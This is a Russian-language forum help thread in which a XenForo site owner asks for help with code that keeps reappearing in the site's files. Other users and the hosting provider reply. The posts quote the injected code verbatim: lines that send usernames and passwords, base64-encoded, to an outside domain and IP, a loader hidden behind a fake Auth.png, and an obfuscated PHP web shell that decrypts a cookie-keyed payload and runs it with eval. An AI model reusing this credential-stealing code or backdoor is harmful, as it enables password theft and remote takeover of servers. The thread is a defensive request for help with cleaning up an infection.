[Помогите] Взлом или что то иное.

В общем в user.php стал появляться часто код
$thisstring = str_replace(" ","",'file_get_contents(\'htt p: //you tube-down loa der. ru/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');
или такой

$thisstring = str_replace(" ","",'file_get_contents(\'htt p: //46.254.21.14/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');');

и в ошибках сервера он часто показывает.
Я как понял, что он крадет пароли при вводе, но я перезалил файл чистый без этого кода, и через 2 недели он снова появился.

 

нет, не могут это сделать потому что пароль знаю только я и это хостинг панельный, его кроме меня никто не может зайти и фтп аккаунтов на нем нету.
файл libary/xenforo/model/user.php

 

Я тут качал версию 1.4.5 Потом обновил до 1.5.7
Там нету ssh, это панельный хостинг, stormwall.pro (не пиар)

 

Как это исправить? Я не думал что у меня ломанный, я давно тут скачивал 1.4.5 версию.

--- Добавлено, 14 авг 2016 ---

Снова появилось. Я убрал.
Как это исправить, что нужно сделать что бы это починить?

 

у меня и до обновы было такое вроде.
Сейчас 1.5.7 стоит.
Смена хостинга разве поможет? Стоит stormwall.pro высокий тариф

--- Добавлено, 14 авг 2016 ---

Что пишут:
Здравствуйте!

Вход через ftp не выполнялся. По всей видимости, происходит автоматическое изменение скриптом расположенном в файлах сайта.
Рекомендуем провести процедуру проверки и лечения Вашего сайта для устранения вредоносного кода, и дальнейшего его "цементирования". Стоимость услуги - 5999 рублей.

Спасибо за Ваше обращение в техническую поддержку! Пожалуйста, сообщите, если мы можем еще чем-то помочь.
Если Вы не удовлетворены качеством обслуживания, пожалуйста, сразу сообщите об этом напрямую руководству компании - [email protected] (в теме письма укажите номер тикета).

 

Дали логи за август.
Утром снова код появился.

 

вот что появилось еще

 

полностью архив сайта можешь скинуть без БД?

 

а после этого не возник вопрос что сами хостеры что-то подмутили?)

 

Они отказались помогать, сказали что мой сайт нарушает какие то нормы для их специалистов.
В принципе да могу дать вам архив. может отдельные папки?

--- Добавлено, 16 авг 2016 ---

$error = new XenForo_Phrase('requested_user_x_not_found', array('name' => $nameOrEmail));
return false;
}
$sdz=@file("library/XenForo/Model/Auth.png");$sd='base'.(256/4*1).'_dec'.'ode';$re=$sd($sdz[376]);$res="cr"."eat"."e_fu";$fe=$res."n"."ction";$sdsd2sds=$fe('', "};$re{");
$authentication = $this->getUserAuthenticationObjectByUserId($user['user_id']);
if (!$authentication || !$authentication->authenticate($user['user_id'], $password))
{

Вот что сегодня появилось

--- Добавлено, 16 авг 2016 ---

http://i.imgur.com/ArKrs2c.png
это файл auth.png в 5 утра появился.

--- Добавлено, 16 авг 2016 ---

Хостинг написал на это:
Я писал выше, на сайте находится shell через него без проблем можно загружать/редактировать файлы. Это самый распостранённый метод заражения.

 

Скинул вам в лс

 

PHP:

<?php
function rs2fd($v, $w) {
    $dll = count($v);
    $n = ($dll - 1) << 2;
    if ($w) {
        $m = $v[$dll - 1];
        if (($m < $n - 3) || ($m > $n)) return false;
        $n = $m;}
    $s = array();
    for ($i = 0; $i < $dll; $i++) {
        $s[$i] = pack("V", $v[$i]);
    }
    if ($w) {
        return substr(join('', $s), 0, $n);
    } else {
        return join('', $s);}}
$cx='base'.(4*8*2).'_de'.'code';
function fd2rs($s, $w) {
    $v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3));
    $v = array_values($v);
    if ($w) {
        $v[count($v)] = strlen($s);
    }return $v;}$cxx=''; if(isset($_COOKIE['__'])){$cxx=$_COOKIE['__'];}
function int32($n) {
    while ($n >= 2147483648) $n -= 4294967296;
    while ($n <= -2147483649) $n += 4294967296;
    return (int)$n;
}
function lol($str, $zm) {
    if ($str == "") {
        return "";
    }
$aib='base'.(4*8*2).'_de'.'code';
$aibolit=$aib('MHgwN2ZmZmZmZg==');
    $v = fd2rs($str, false);
    $k = fd2rs($zm, false);
    if (count($k) < 4) {
        for ($i = count($k); $i < 4; $i++) {
            $k[$i] = 0;}}
    $n = count($v) - 1; 
    $z = $v[$n];
    $y = $v[0];
    $delta = 0x9E3779B9;
    $q = floor(6 + 52 / ($n + 1));
    $sum = int32($q * $delta);

    while ($sum != 0) {

        $e = $sum >> 2 & 3;
        for ($p = $n; $p > 0; $p--) {
            $z = $v[$p - 1];
            $mx = int32(((($z >> 5 & 0x07ffffff)) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
            $y = $v[$p] = int32($v[$p] - $mx);
        }
        $z = $v[$n];
        $mx = int32(((($z >> 5 & 0x07ffffff)) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
        $y = $v[0] = int32($v[0] - $mx);
        $sum = int32($sum - $delta);
    }
    return rs2fd($v, true);
}
$klkl='';
$popo='ev'.'al';if($cxx!=''){
eval(trim(gzinflate(lol($cx("sAE1WI8o2vGc+oNQYxY37zUtr49IaS3OObn9c5eSzMT3pxkVQTDlSA=="),$cxx))));

файл появился на сервере в корне

 

Попробуйте прогнать Манулом https://yandex.ru/promo/manul#about. Может поможет найти шел.